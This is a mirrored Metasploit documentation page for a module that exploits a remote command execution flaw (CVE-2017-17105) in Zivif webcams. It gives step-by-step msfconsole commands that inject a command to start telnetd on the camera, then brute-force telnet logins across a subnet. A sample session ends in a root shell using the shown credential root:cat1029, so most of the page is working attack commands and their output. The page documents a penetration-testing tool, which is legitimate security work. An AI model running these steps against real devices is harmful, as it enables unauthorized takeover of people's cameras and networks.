CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md
Views: 1904

Description

This module exploits a remote command execution vulnerability in Zivif webcams. This is known to impact versions prior to and including v2.3.4.2103. Exploit was reported in CVE-2017-17105.

This module has been tested successfully on version v2.3.4.2103 and V4.7.4.2121.

Vulnerable Application

Unfortunately a virtual copy of this camera is not available.

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/unix/http/zivif_ipcheck_exec

  3. Do: set rhost [IP]

  4. Do: set PAYLOAD payload/cmd/unix/generic

  5. Do: set CMD telnetd

  6. Do: exploit

  7. Port 23 will now be open on the target

Scenarios

msf5 > use exploit/unix/http/zivif_ipcheck_exec
msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
rhost => 192.168.0.35
msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
CMD => telenetd
msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit 

[*] Sending request
[+] Command sent successfully
[*] Exploit completed, but no session was created.
msf5 exploit(unix/http/zivif_ipcheck_exec) > 
msf5 exploit(unix/http/zivif_ipcheck_exec) > back
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
USERPASS_FILE => /root/creds
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > exploit 

[!] 192.168.0.34:23          - No active DB -- Credential data will not be saved!
[+] 192.168.0.34:23          - 192.168.0.34:23 - Login Successful: root:cat1029
[*] 192.168.0.34:23          - Attempting to start session 192.168.0.34:23 with root:cat1029
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000

[-] 192.168.0.34:23          - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
[*] 192.168.0.34:23          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) > 
msf5 auxiliary(scanner/telnet/telnet_login) > sessions 

Active sessions
===============

  Id  Name  Type   Information                         Connection
  --  ----  ----   -----------                         ----------
  1         shell  TELNET root:cat1029 (192.168.0.34:23)  0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)

msf5 auxiliary(scanner/telnet/telnet_login) >